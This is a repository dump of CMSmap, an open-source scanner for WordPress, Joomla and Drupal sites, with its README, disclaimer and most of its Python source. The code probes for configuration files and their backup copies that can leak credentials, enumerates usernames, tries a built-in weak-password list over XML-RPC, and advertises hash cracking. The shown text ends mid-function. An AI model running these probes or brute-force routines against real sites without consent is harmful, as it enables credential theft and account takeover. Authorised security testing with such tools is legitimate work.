├── .gitattributes ├── .gitignore ├── DISCLAIMER.txt ├── LICENSE.txt ├── README.md ├── Screenshot.png ├── cmsmap.py ├── data ├── common_files.txt ├── dru_plugins.txt ├── dru_plugins_small.txt ├── dru_versions.txt ├── joo_plugins.txt ├── joo_plugins_small.txt ├── joo_versions.txt ├── wp_plugins.txt ├── wp_plugins_small.txt ├── wp_themes.txt ├── wp_themes_small.txt ├── wp_timthumbs.txt └── wp_versions.txt ├── shell ├── dru-shell.zip ├── joo-shell.zip └── wp-shell.zip └── thirdparty ├── __init__.py └── multipart ├── __init__.py └── multipartpost.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Windows image file caches 2 | Thumbs.db 3 | ehthumbs.db 4 | 5 | # Folder config file 6 | Desktop.ini 7 | 8 | # Recycle Bin used on file shares 9 | $RECYCLE.BIN/ 10 | 11 | # Windows Installer files 12 | *.cab 13 | *.msi 14 | *.msm 15 | *.msp 16 | 17 | # Windows shortcuts 18 | *.lnk 19 | 20 | # ========================= 21 | # Operating System Files 22 | # ========================= 23 | 24 | # OSX 25 | # ========================= 26 | 27 | .DS_Store 28 | .AppleDouble 29 | .LSOverride 30 | 31 | # Thumbnails 32 | ._* 33 | 34 | # Files that might appear in the root of a volume 35 | .DocumentRevisions-V100 36 | .fseventsd 37 | .Spotlight-V100 38 | .TemporaryItems 39 | .Trashes 40 | .VolumeIcon.icns 41 | 42 | # Directories potentially created on remote AFP share 43 | .AppleDB 44 | .AppleDesktop 45 | Network Trash Folder 46 | Temporary Items 47 | .apdisk 48 | -------------------------------------------------------------------------------- /DISCLAIMER.txt: -------------------------------------------------------------------------------- 1 | Usage of CMSmap for attacking targets without prior mutual consent is illegal. 2 | It is the end user's responsibility to obey all applicable local, state and federal laws. 3 | Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | CMSmap is (C) 2013-2014 Mike Manzotti @ Dionach Ltd. 2 | 3 | This program is free software; you may redistribute and/or modify it under 4 | the terms of the GNU General Public License as published by the Free Software Foundation, 5 | either version 3 of the License, or (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program. If not, see http://www.gnu.org/licenses/. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [CMSmap](https://github.com/The404Hacking/CMSmap) v0.6 - Simple CMS Scanner 2 | ================================ 3 | 4 | ![CMSmap](Screenshot.png?raw=true "CMSmap") 5 | 6 | CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities 7 | for different types of CMSs in a single tool. 8 | 9 | At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal. 10 | 11 | Please note that this project is an early state. As such, you might find bugs, flaws or mulfunctions. 12 | Use it at your own risk! 13 | 14 | 15 | Installation 16 | ===== 17 | You can download the latest version of CMSmap by cloning the GitHub repository: 18 | 19 | git clone https://github.com/The404Hacking/CMSmap.git 20 | 21 | 22 | Usage 23 | ===== 24 | CMSmap tool v0.6 - Simple CMS Scanner 25 | Author: Mike Manzotti mike.manzotti@dionach.com 26 | Usage: cmsmap.py -t 27 | Targets: 28 | -t, --target target URL (e.g. 'https://example.com:8080/') 29 | -f, --force force scan (W)ordpress, (J)oomla or (D)rupal 30 | -F, --fullscan full scan using large plugin lists. False positives and slow! 31 | -a, --agent set custom user-agent 32 | -T, --threads number of threads (Default: 5) 33 | -i, --input scan multiple targets listed in a given text file 34 | -o, --output save output in a file 35 | --noedb enumerate plugins without searching exploits 36 | 37 | Brute-Force: 38 | -u, --usr username or file 39 | -p, --psw password or file 40 | --noxmlrpc brute forcing WordPress without XML-RPC 41 | 42 | Post Exploitation: 43 | -k, --crack password hashes file (Require hashcat installed. For WordPress and Joomla only) 44 | -w, --wordlist wordlist file 45 | 46 | Others: 47 | -v, --verbose verbose mode (Default: false) 48 | -U, --update (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll 49 | -h, --help show this help 50 | 51 | Examples: 52 | cmsmap.py -t https://example.com 53 | cmsmap.py -t https://example.com -f W -F --noedb 54 | cmsmap.py -t https://example.com -i targets.txt -o output.txt 55 | cmsmap.py -t https://example.com -u admin -p passwords.txt 56 | cmsmap.py -k hashes.txt -w passwords.txt 57 | 58 | 59 | Notes 60 | ===== 61 | 30/03/2015: Created a new repo to remove big wordlist. Users who have originally cloned the previous repo are invited to clone the new one. 62 | 63 | 64 | Disclaimer 65 | ===== 66 | Usage of CMSmap for attacking targets without prior mutual consent is illegal. 67 | It is the end user's responsibility to obey all applicable local, state and federal laws. 68 | Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. 69 | 70 | 71 | ## Download and Clone 72 | > Download: [https://github.com/The404Hacking/CMSmap/archive/master.zip](https://github.com/The404Hacking/CMSmap/archive/master.zip) 73 | 74 | > Clone: git clone [https://github.com/The404Hacking/CMSmap](https://github.com/The404Hacking/CMSmap.git) 75 | 76 | ## The404Hacking | Digital UnderGround Team 77 | [The404Hacking](https://T.me/The404Hacking) 78 | 79 | ## Follow us ! 80 | [The404Hacking](https://T.me/The404Hacking) - [The404Cracking](https://T.me/The404Cracking) 81 | 82 | [Instagram](https://instagram.com/The404Hacking) - [GitHub](https://github.com/The404Hacking) 83 | 84 | [YouTube](http://yon.ir/youtube404) - [Aparat](http://www.aparat.com/The404Hacking) 85 | 86 | [Weblog](http://the404hacking.blogsky.com) - [Email](mailto:The404Hacking.Team@Gmail.Com) 87 | -------------------------------------------------------------------------------- /Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The404Hacking/CMSmap/ee8fa1b3ab5e86e583ad61ee993ca428699723d7/Screenshot.png -------------------------------------------------------------------------------- /cmsmap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import smtplib, base64, os, sys, getopt, urllib2, urllib, re, socket, time, httplib, tarfile 3 | import itertools, urlparse, threading, Queue, multiprocessing, cookielib, datetime, zipfile 4 | import platform, signal 5 | from thirdparty.multipart import multipartpost 6 | from distutils.version import LooseVersion 7 | 8 | class Initialize: 9 | def __init__(self): 10 | self.agent = agent 11 | self.headers={'User-Agent':self.agent,} 12 | self.ospath = dataPath 13 | self.forceUpdate = None 14 | # Wordpress 15 | self.wp_plugins = os.path.join(self.ospath,"wp_plugins.txt") 16 | self.wp_plugins_small = os.path.join(self.ospath,"wp_plugins_small.txt") 17 | self.wp_themes_small = os.path.join(self.ospath,"wp_themes_small.txt") 18 | # Joomla 19 | self.joo_plugins = os.path.join(self.ospath,"joo_plugins.txt") 20 | self.joo_plugins_small = os.path.join(self.ospath,"joo_plugins_small.txt") 21 | # Drupal 22 | self.dru_plugins = os.path.join(self.ospath,"dru_plugins.txt") 23 | self.dru_plugins_small = os.path.join(self.ospath,"dru_plugins_small.txt") 24 | # ExploitDB 25 | self.wp_exploitdb_url = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Wordpress" 26 | self.joo_exploitdb_url = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Joomla" 27 | 28 | def UpdateRun(self): 29 | if self.forceUpdate == 'C': 30 | self.CMSmapUpdate() 31 | elif self.forceUpdate == 'W': 32 | self.GetWordPressPlugins() 33 | msg = "Downloading WordPress plugins from ExploitDB website"; report.message(msg) 34 | self.GetExploitDBPlugins(self.wp_exploitdb_url, self.wp_plugins_small, 'Wordpress', 'wp-content/plugins/(.+?)/') 35 | msg = "Downloading WordPress themes from ExploitDB website"; report.message(msg) 36 | self.GetExploitDBPlugins(self.wp_exploitdb_url, self.wp_themes_small, 'Wordpress', 'wp-content/themes/([\w\-\_]*)/') 37 | elif self.forceUpdate == 'J': 38 | msg = "Downloading Joomla components from ExploitDB website"; report.message(msg) 39 | self.GetExploitDBPlugins(self.joo_exploitdb_url, self.joo_plugins_small, 'Joomla', '\?option=(com.+?)\&') 40 | elif self.forceUpdate == 'D': 41 | self.GetDrupalPlugins() 42 | elif self.forceUpdate == 'A': 43 | self.CMSmapUpdate() 44 | self.GetWordPressPlugins() 45 | msg = "Downloading WordPress plugins from ExploitDB website"; report.message(msg) 46 | self.GetExploitDBPlugins(self.wp_exploitdb_url, self.wp_plugins_small, 'Wordpress', 'wp-content/plugins/(.+?)/') 47 | msg = "Downloading WordPress themes from ExploitDB website"; report.message(msg) 48 | self.GetExploitDBPlugins(self.wp_exploitdb_url, self.wp_themes_small, 'Wordpress', 'wp-content/themes/([\w\-\_]*)/') 49 | msg = "Downloading Joomla components from ExploitDB website"; report.message(msg) 50 | self.GetExploitDBPlugins(self.joo_exploitdb_url, self.joo_plugins_small, 'Joomla', '\?option=(com.+?)\&') 51 | self.GetDrupalPlugins() 52 | else: 53 | msg = "Not Valid Option Provided: use (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll"; report.message(msg) 54 | msg = "Assuming: (C)MSmap update"; report.message(msg) 55 | self.CMSmapUpdate() 56 | self.SortUniqueFile() 57 | 58 | def SortUniqueFile(self) : 59 | for list in [self.wp_plugins, 60 | self.wp_plugins_small, 61 | self.wp_themes_small, 62 | self.joo_plugins, 63 | self.joo_plugins_small , 64 | self.dru_plugins, 65 | self.dru_plugins_small]: 66 | readlist = sorted(set([line.strip() for line in open(list)])) 67 | f = open(list, "w") 68 | for plugin in readlist: 69 | f.write("%s\n" % plugin) 70 | f.close() 71 | sys.exit() 72 | 73 | def CMSmapUpdate(self): 74 | success = False 75 | if not self.ospath+".git": 76 | msg = "Git Repository Not Found. Please download the latest version of CMSmap from GitHub repository"; report.error(msg) 77 | msg = "Example: git clone https://github.com/Dionach/cmsmap"; report.error(msg) 78 | else: 79 | msg = "Updating CMSmap to the latest version from GitHub repository... "; report.message(msg) 80 | os.chdir(self.ospath) 81 | process = os.system("git pull") 82 | if process == 0 : success = True 83 | if success : 84 | msg = "CMSmap is now updated to the latest version!"; report.message(msg) 85 | else : 86 | msg = " Updated could not be completed. Please download the latest version of CMSmap from GitHub repository"; report.error(msg) 87 | msg = " Example: git clone https://github.com/Dionach/cmsmap"; report.error(msg) 88 | 89 | def GetWordPressPlugins(self): 90 | msg = "Downloading wordpress plugins from svn website"; report.message(msg) 91 | f = open(self.wp_plugins, "a") 92 | htmltext = urllib2.urlopen("http://plugins.svn.wordpress.org").read() 93 | regex = '">(.+?)/' 94 | pattern = re.compile(regex) 95 | plugins = re.findall(pattern,htmltext) 96 | if plugins : 97 | msg = str(len(plugins))+" plugins found"; report.message(msg) 98 | for plugin in plugins: 99 | try: 100 | f.write("%s\n" % plugin.encode('utf-8')) 101 | except: 102 | pass 103 | sys.stdout.write("\r%d%%" %((100*(plugins.index(plugin)))/len(plugins))) 104 | sys.stdout.flush() 105 | sys.stdout.write("\r") 106 | sys.stdout.flush() 107 | msg ="Wordpress Plugin File: %s" % (self.wp_plugins); report.message(msg) 108 | else: 109 | msg = "unable to extract plugins from wordpress svn website"; report.error(msg) 110 | f.close() 111 | 112 | def GetJoomlaPlugins(self): 113 | # Not Implemented yet 114 | pass 115 | 116 | def GetDrupalPlugins(self): 117 | # Download Drupal Plugins from Drupal website 118 | msg = "Downloading drupal modules from drupal.org"; report.message(msg) 119 | f = open(self.dru_plugins_small, "a") 120 | for page in range(0,int(10)): 121 | htmltext = urllib2.urlopen("https://drupal.org/project/project_module?page="+str(page)+"&f[4]=sm_field_project_type:full&text=&solrsort=iss_project_release_usage+desc&").read() 122 | regex = '

' 123 | pattern = re.compile(regex) 124 | self.dru_plugins_extracted = re.findall(pattern,htmltext) 125 | self.dru_plugins_extracted = sorted(set(self.dru_plugins_extracted)) 126 | for plugin in self.dru_plugins_extracted: 127 | f.write("%s\n" % plugin) 128 | sys.stdout.write("\r%d%%" %((100*(page+1))/int(10))) 129 | sys.stdout.flush() 130 | f.close() 131 | sys.stdout.write("\r") 132 | sys.stdout.flush() 133 | msg = "Drupal Plugin File: "+ self.dru_plugins_small; report.message(msg) 134 | 135 | def GetExploitDBPlugins(self,exploitdb_url,plugins_small,filter_description,regex): 136 | self.exploitdb_url = exploitdb_url 137 | self.plugins_small = plugins_small 138 | self.filter_description = filter_description 139 | self.regex = regex 140 | # Append to file 141 | f = open(self.plugins_small, "a") 142 | htmltext = urllib2.urlopen(self.exploitdb_url).read() 143 | regex ='filter_page=(.+?)\t\t\t.*>>>' 144 | pattern = re.compile(regex) 145 | self.pages = re.findall(pattern,htmltext) 146 | if self.pages: 147 | self.pages = self.pages[0] 148 | msg = str(self.pages)+" total pages"; msg = report.verbose(msg) 149 | # Search all page 150 | for self.page in range(1,int(self.pages)): 151 | time.sleep(1) 152 | self.exploitdb_url_page = "http://www.exploit-db.com/search/?action=search&filter_page="+str(self.page)+"&filter_description="+self.filter_description 153 | request = urllib2.Request(self.exploitdb_url_page,None,self.headers) 154 | htmltext = urllib2.urlopen(request).read() 155 | pattern = re.compile('') 156 | self.ExploitID = re.findall(pattern,htmltext) 157 | # Search in a single page 158 | for self.Eid in self.ExploitID: 159 | htmltext = urllib2.urlopen("http://www.exploit-db.com/download/"+str(self.Eid)+"/").read() 160 | pattern = re.compile(self.regex) 161 | self.ExploitDBplugins = re.findall(pattern,htmltext) 162 | sys.stdout.write("\r%d%%"%((100*(int(self.page)+1))/int(self.pages))) 163 | sys.stdout.flush() 164 | # Sorted Unique 165 | self.ExploitDBplugins = sorted(set(self.ExploitDBplugins)) 166 | for self.plugin in self.ExploitDBplugins: 167 | sys.stdout.write("\r%d%%"% (((100*(int(self.page)+1))/int(self.pages)))) 168 | if not re.search('.php',self.plugin): 169 | try: 170 | f.write("%s\n" % self.plugin) 171 | except IndexError: 172 | pass 173 | f.close() 174 | sys.stdout.write("\r") 175 | msg = "File: " +self.plugins_small; report.message(msg) 176 | 177 | class Scanner: 178 | # Detect type of CMS -> Maybe add it to the main after Initialiazer 179 | def __init__(self): 180 | self.agent = agent 181 | self.headers={'User-Agent':self.agent,} 182 | self.url = None 183 | self.force = None 184 | self.threads = None 185 | self.file = None 186 | self.notExistingCode = 404 187 | self.notValidLen = [] 188 | 189 | def ForceCMSType(self): 190 | GenericChecks(self.url).HTTPSCheck() 191 | GenericChecks(self.url).HeadersCheck() 192 | GenericChecks(self.url).RobotsTXT() 193 | if self.force == 'W': 194 | WPScan(self.url,self.threads).WPrun() 195 | elif self.force == 'J': 196 | JooScan(self.url,self.threads).Joorun() 197 | elif self.force == 'D': 198 | DruScan(self.url,"default",self.threads).Drurun() 199 | else: 200 | msg = "Not Valid Option Provided: use (W)ordpress, (J)oomla, (D)rupal"; report.error(msg) 201 | sys.exit() 202 | 203 | def FindCMSType(self): 204 | req = urllib2.Request(self.url,None,self.headers) 205 | try: 206 | htmltext = urllib2.urlopen(req).read() 207 | # WordPress 208 | req = urllib2.Request(self.url+"/wp-config.php") 209 | try: 210 | htmltext = urllib2.urlopen(req).read() 211 | if len(htmltext) not in self.notValidLen and self.force is None: 212 | self.force = 'W' 213 | except urllib2.HTTPError, e: 214 | #print e.code 215 | if e.code == 403 and len(htmltext) not in self.notValidLen and self.force is None: 216 | self.force = 'W' 217 | else: 218 | #print e.code 219 | msg = "WordPress Config File Not Found: "+self.url+"/wp-config.php" 220 | report.verbose(msg) 221 | # Joomla 222 | req = urllib2.Request(self.url+"/configuration.php") 223 | try: 224 | htmltext = urllib2.urlopen(req).read() 225 | if len(htmltext) not in self.notValidLen and self.force is None: 226 | self.force = 'J' 227 | except urllib2.HTTPError, e: 228 | if e.code == 403 and len(e.read()) not in self.notValidLen and self.force is None: 229 | self.force = 'J' 230 | else: 231 | #print e.code 232 | msg = "Joomla Config File Not Found: "+self.url+"/configuration.php" 233 | report.verbose(msg) 234 | # Drupal 235 | req = urllib2.Request(self.url+"/sites/default/settings.php") 236 | try: 237 | htmltext = urllib2.urlopen(req).read() 238 | if len(htmltext) not in self.notValidLen and self.force is None: 239 | self.force = 'D' 240 | except urllib2.HTTPError, e: 241 | pUrl = urlparse.urlparse(self.url) 242 | netloc = pUrl.netloc.lower() 243 | req = urllib2.Request(self.url+"/sites/"+netloc+"/settings.php") 244 | try: 245 | urllib2.urlopen(req) 246 | if len(e.read()) not in self.notValidLen and self.force is None: 247 | self.force = 'D' 248 | except urllib2.HTTPError, e: 249 | if e.code == 403 and len(e.read()) not in self.notValidLen and self.force is None: 250 | self.force = 'D' 251 | else: 252 | if verbose: 253 | #print e.code 254 | msg = "Drupal Config File Not Found: "+self.url+"/sites/default/settings.php" 255 | report.verbose(msg) 256 | if self.force is None : 257 | msg = "CMS detection failed :("; report.error(msg) 258 | msg = "Use -f to force CMSmap to scan (W)ordpress, (J)oomla or (D)rupal"; report.error(msg) 259 | sys.exit() 260 | except urllib2.URLError, e: 261 | msg = "Website Unreachable: "+self.url 262 | report.error(msg) 263 | sys.exit() 264 | 265 | def CheckURL(self): 266 | pUrl = urlparse.urlparse(self.url) 267 | #clean up supplied URLs 268 | netloc = pUrl.netloc.lower() 269 | scheme = pUrl.scheme.lower() 270 | path = pUrl.path.lower() 271 | if not scheme: 272 | self.url = "http://" + self.url 273 | report.status("No HTTP/HTTPS provided. Assuming HTTP...") 274 | if path.endswith("asp" or "aspx"): 275 | report.error("You are not scanning a PHP website") 276 | sys.exit() 277 | if path.endswith("txt" or "php"): 278 | self.url = re.findall(re.compile('(.+?)/[A-Za-z0-9]+\.txt|php'),self.url)[0] 279 | 280 | def NotExisitingCode(self): 281 | self.NotExisitingFile = ["/N0W43H3r3.php","/N0W"+time.strftime('%d%m%H%M%S')+".php", "/N0WaY/N0WaY12/N0WaY123.php"] 282 | # check without URL redirection 283 | for file in self.NotExisitingFile : 284 | req = urllib2.Request(self.url+file,None, self.headers) 285 | noRedirOpener = urllib2.build_opener(NoRedirects()) 286 | try: 287 | htmltext = noRedirOpener.open(req).read() 288 | self.notValidLen.append(len(htmltext)) 289 | except urllib2.HTTPError, e: 290 | #print e.code 291 | self.notValidLen.append(len(e.read())) 292 | self.notExistingCode = e.code 293 | except urllib2.URLError, e: 294 | msg = "Website Unreachable: "+self.url 295 | report.error(msg) 296 | sys.exit() 297 | # check with URL redirection 298 | for file in self.NotExisitingFile : 299 | req = urllib2.Request(self.url+file,None, self.headers) 300 | try: 301 | htmltext = urllib2.urlopen(req).read() 302 | self.notValidLen.append(len(htmltext)) 303 | except urllib2.HTTPError, e: 304 | #print e.code 305 | self.notValidLen.append(len(e.read())) 306 | self.notExistingCode = e.code 307 | except urllib2.URLError, e: 308 | msg = "Website Unreachable: "+self.url 309 | report.error(msg) 310 | sys.exit() 311 | self.notValidLen = sorted(set(self.notValidLen)) 312 | 313 | class WPScan: 314 | # Scan WordPress site 315 | def __init__(self,url,threads): 316 | self.headers={'User-Agent':agent,} 317 | self.url = url 318 | self.currentVer = None 319 | self.latestVer = None 320 | self.queue_num = 5 321 | self.thread_num = threads 322 | self.pluginPath = "/wp-content/plugins/" 323 | self.themePath = "/wp-content/themes/" 324 | self.feed = "/?feed=rss2" 325 | self.author = "/?author=" 326 | self.forgottenPsw = "/wp-login.php?action=lostpassword" 327 | self.weakpsw = ['password', 'admin','123456','Password1'] # 5th attempt is the username 328 | self.usernames = [] 329 | self.pluginsFound = [] 330 | self.themesFound = [] 331 | self.timthumbsFound = [] 332 | self.notValidLen = [] 333 | self.theme = None 334 | self.notExistingCode = 404 335 | self.confFiles=['','.php~','.php.txt','.php.old','.php_old','.php-old','.php.save','.php.swp','.php.swo','.php_bak','.php-bak','.php.original','.php.old','.php.orig','.php.bak','.save','.old','.bak','.orig','.original','.txt'] 336 | self.genChecker = GenericChecks(url) 337 | self.genChecker.NotExisitingLength() 338 | self.plugins_small = [line.strip() for line in open(os.path.join(dataPath, 'wp_plugins_small.txt'))] 339 | self.plugins = [line.strip() for line in open(os.path.join(dataPath, 'wp_plugins.txt'))] 340 | self.versions = [line.strip() for line in open(os.path.join(dataPath, 'wp_versions.txt'))] 341 | self.themes = [line.strip() for line in open(os.path.join(dataPath, 'wp_themes.txt'))] 342 | self.themes_small = [line.strip() for line in open(os.path.join(dataPath, 'wp_themes_small.txt'))] 343 | self.timthumbs = [line.strip() for line in open(os.path.join(dataPath, 'wp_timthumbs.txt'))] 344 | searcher.cmstype = "Wordpress" 345 | 346 | def WPrun(self): 347 | msg = "CMS Detection: Wordpress"; report.info(msg) 348 | self.WPNotExisitingCode() 349 | self.WPVersion() 350 | self.WPCurrentTheme() 351 | self.WPConfigFiles() 352 | self.WPHello() 353 | self.WPFeed() 354 | self.WPAuthor() 355 | bruter.usrlist = self.usernames 356 | bruter.pswlist = self.weakpsw 357 | bruter.WPXMLRPC_brute() 358 | self.WPForgottenPassword() 359 | self.WPXMLRPC_pingback() 360 | self.WPXMLRPC_BF() 361 | self.genChecker.AutocompleteOff('/wp-login.php') 362 | self.WPDefaultFiles() 363 | if FullScan : self.genChecker.CommonFiles() 364 | self.WPpluginsIndex() 365 | self.WPplugins() 366 | searcher.query = self.pluginsFound; searcher.Plugins() 367 | if FullScan : self.WPThemes(); searcher.query = self.themesFound; searcher.Themes() 368 | self.WPTimThumbs() 369 | self.WPDirsListing() 370 | 371 | def WPVersion(self): 372 | try: 373 | req = urllib2.Request(self.url+'/readme.html',None,self.headers) 374 | htmltext = urllib2.urlopen(req).read() 375 | regex = '.*wordpress-logo.png" />\n.*
.* (\d+\.\d+[\.\d+]*)\n

' 376 | pattern = re.compile(regex) 377 | version = re.findall(pattern,htmltext) 378 | if version: 379 | msg = "Wordpress Version: "+version[0]; report.info(msg) 380 | except urllib2.HTTPError, e: 381 | try: 382 | req = urllib2.Request(self.url,None,self.headers) 383 | htmltext = urllib2.urlopen(req).read() 384 | version = re.findall('", htmltext,re.IGNORECASE) 461 | wpUsers2 = re.findall("(.+?)", htmltext,re.IGNORECASE) 462 | if wpUsers : 463 | self.usernames = wpUsers + self.usernames 464 | self.usernames = sorted(set(self.usernames)) 465 | #for user in self.usernames: 466 | #msg = user; report.medium(msg) 467 | except urllib2.HTTPError, e: 468 | #print e.code 469 | pass 470 | 471 | def WPAuthor(self): 472 | msg = "Enumerating Wordpress Usernames via \"Author\" ..."; report.message(msg) 473 | for user in range(1,20): 474 | try: 475 | req = urllib2.Request(self.url+self.author+str(user),None,self.headers) 476 | htmltext = urllib2.urlopen(req).read() 477 | wpUser = re.findall("author author-(.+?) ", htmltext,re.IGNORECASE) 478 | if wpUser : self.usernames = wpUser + self.usernames 479 | wpUser = re.findall("/author/(.+?)/feed/", htmltext,re.IGNORECASE) 480 | if wpUser : self.usernames = wpUser + self.usernames 481 | except urllib2.HTTPError, e: 482 | #print e.code 483 | pass 484 | self.usernames = sorted(set(self.usernames)) 485 | for user in self.usernames: 486 | msg = user; report.medium(msg) 487 | 488 | def WPForgottenPassword(self): 489 | # Username Enumeration via Forgotten Password 490 | query_args = {"user_login": "N0t3xist!1234"} 491 | data = urllib.urlencode(query_args) 492 | # HTTP POST Request 493 | req = urllib2.Request(self.url+self.forgottenPsw, data,self.headers) 494 | try: 495 | htmltext = urllib2.urlopen(req).read() 496 | if re.findall(re.compile('Invalid username'),htmltext): 497 | msg = "Forgotten Password Allows Username Enumeration: "+self.url+self.forgottenPsw; report.info(msg) 498 | except urllib2.HTTPError, e: 499 | #print e.code 500 | pass 501 | 502 | def WPHello(self): 503 | try: 504 | req = urllib2.Request(self.url+"/wp-content/plugins/hello.php",None,self.headers) 505 | htmltext = urllib2.urlopen(req).read() 506 | fullPath = re.findall(re.compile('Fatal error.*>/(.+?/)hello.php'),htmltext) 507 | if fullPath : 508 | msg = "Wordpress Hello Plugin Full Path Disclosure: "+"/"+fullPath[0]+"hello.php"; report.low(msg) 509 | except urllib2.HTTPError, e: 510 | #print e.code 511 | pass 512 | 513 | def WPDirsListing(self): 514 | msg = "Checking for Directory Listing Enabled ..."; report.info(msg) 515 | report.WriteTextFile(msg) 516 | GenericChecks(self.url).DirectoryListing('/wp-content/') 517 | if self.theme: GenericChecks(self.url).DirectoryListing('/wp-content/'+self.theme) 518 | GenericChecks(self.url).DirectoryListing('/wp-includes/') 519 | GenericChecks(self.url).DirectoryListing('/wp-admin/') 520 | for plugin in self.pluginsFound: 521 | GenericChecks(self.url).DirectoryListing('/wp-content/plugins/'+plugin) 522 | 523 | def WPNotExisitingCode(self): 524 | req = urllib2.Request(self.url+self.pluginPath+"N0WayThatYouAreHere"+time.strftime('%d%m%H%M%S')+"/",None, self.headers) 525 | noRedirOpener = urllib2.build_opener(NoRedirects()) 526 | try: 527 | htmltext = noRedirOpener.open(req).read() 528 | print htmltext 529 | self.notValidLen.append(len(htmltext)) 530 | except urllib2.HTTPError, e: 531 | self.notValidLen.append(len(e.read())) 532 | self.notExistingCode = e.code 533 | 534 | def WPpluginsIndex(self): 535 | try: 536 | req = urllib2.Request(self.url,None,self.headers) 537 | htmltext = urllib2.urlopen(req).read() 538 | self.pluginsFound = re.findall(re.compile('/wp-content/plugins/(.+?)/'),htmltext) 539 | self.pluginsFound = sorted(set(self.pluginsFound)) 540 | except urllib2.HTTPError, e: 541 | #print e.code 542 | pass 543 | 544 | def WPplugins(self): 545 | msg = "Searching Wordpress Plugins ..."; report.message(msg) 546 | if not FullScan : self.plugins = self.plugins_small 547 | # Create Code 548 | q = Queue.Queue(self.queue_num) 549 | # Spawn all threads into code 550 | for u in range(self.thread_num): 551 | t = ThreadScanner(self.url,self.pluginPath,"/",self.pluginsFound,self.notExistingCode,self.notValidLen,q) 552 | t.daemon = True 553 | t.start() 554 | # Add all plugins to the queue 555 | for r,i in enumerate(self.plugins): 556 | q.put(i) 557 | sys.stdout.write("\r"+str(100*int(r+1)/len(self.plugins))+"%") 558 | sys.stdout.flush() 559 | q.join() 560 | sys.stdout.write("\r") 561 | 562 | def WPTimThumbs(self): 563 | msg = "Searching Wordpress TimThumbs ..."; report.message(msg) 564 | # Create Code 565 | q = Queue.Queue(self.queue_num) 566 | # Spawn all threads into code 567 | for u in range(self.thread_num): 568 | t = ThreadScanner(self.url,"/","",self.timthumbsFound,self.notExistingCode,self.notValidLen,q) 569 | t.daemon = True 570 | t.start() 571 | # Add all plugins to the queue 572 | for r,i in enumerate(self.timthumbs): 573 | q.put(i) 574 | sys.stdout.write("\r"+str(100*int(r+1)/len(self.timthumbs))+"%") 575 | sys.stdout.flush() 576 | q.join() 577 | sys.stdout.write("\r") 578 | if self.timthumbsFound: 579 | for timthumbsFound in self.timthumbsFound: 580 | msg = self.url+"/"+timthumbsFound; report.medium(msg) 581 | msg= " Timthumbs Potentially Vulnerable to File Upload: http://www.exploit-db.com/wordpress-timthumb-exploitation"; report.medium(msg) 582 | 583 | def WPThemes(self): 584 | msg = "Searching Wordpress Themes ..."; report.message(msg) 585 | if not FullScan : self.themes = self.themes_small 586 | # Create Code 587 | q = Queue.Queue(self.queue_num) 588 | # Spawn all threads into code 589 | for u in range(self.thread_num): 590 | t = ThreadScanner(self.url,self.themePath,"/",self.themesFound,self.notExistingCode,self.notValidLen,q) 591 | t.daemon = True 592 | t.start() 593 | # Add all theme to the queue 594 | for r,i in enumerate(self.themes): 595 | q.put(i) 596 | sys.stdout.write("\r"+str(100*int(r+1)/len(self.themes))+"%") 597 | sys.stdout.flush() 598 | q.join() 599 | sys.stdout.write("\r") 600 | for themesFound in self.themesFound: 601 | msg = themesFound; report.info(msg) 602 | 603 | def WPXMLRPC_pingback(self): 604 | msg = "Checking XML-RPC Pingback Vulnerability ..."; report.verbose(msg) 605 | self.postdata = '''pingback.ping 606 | http://N0tB3th3re0484940:22/ 607 | '''+self.url+''' 608 | ''' 609 | try: 610 | req = urllib2.Request(self.url+'/xmlrpc.php',self.postdata,self.headers) 611 | opener = urllib2.build_opener(MyHandler()) 612 | htmltext = opener.open(req).read() 613 | if re.search('16',htmltext): 614 | msg = "Website vulnerable to XML-RPC Pingback Force Vulnerability"; report.low(msg) 615 | except urllib2.HTTPError, e: 616 | #print e.code 617 | pass 618 | 619 | def WPXMLRPC_BF(self): 620 | msg = "Checking XML-RPC Brute Force Vulnerability ..."; report.verbose(msg) 621 | self.headers['Content-Type'] ='text/xml' 622 | self.postdata = '''wp.getUsersBlogs 623 | admin 624 | 625 | ''' 626 | try: 627 | req = urllib2.Request(self.url+'/xmlrpc.php',self.postdata,self.headers) 628 | #opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)) 629 | opener = urllib2.build_opener(MyHandler()) 630 | htmltext = opener.open(req).read() 631 | if re.search('403',htmltext): 632 | msg = "Website vulnerable to XML-RPC Brute Force Vulnerability"; report.medium(msg) 633 | except urllib2.HTTPError, e: 634 | print e.code 635 | pass 636 | 637 | 638 | class MyResponse(httplib.HTTPResponse): 639 | def read(self, amt=None): 640 | self.length = None 641 | 642 | return httplib.HTTPResponse.read(self, amt) 643 | 644 | class MyHandler(urllib2.HTTPHandler): 645 | def do_open(self, http_class, req): 646 | h = httplib.HTTPConnection 647 | h.response_class = MyResponse 648 | 649 | 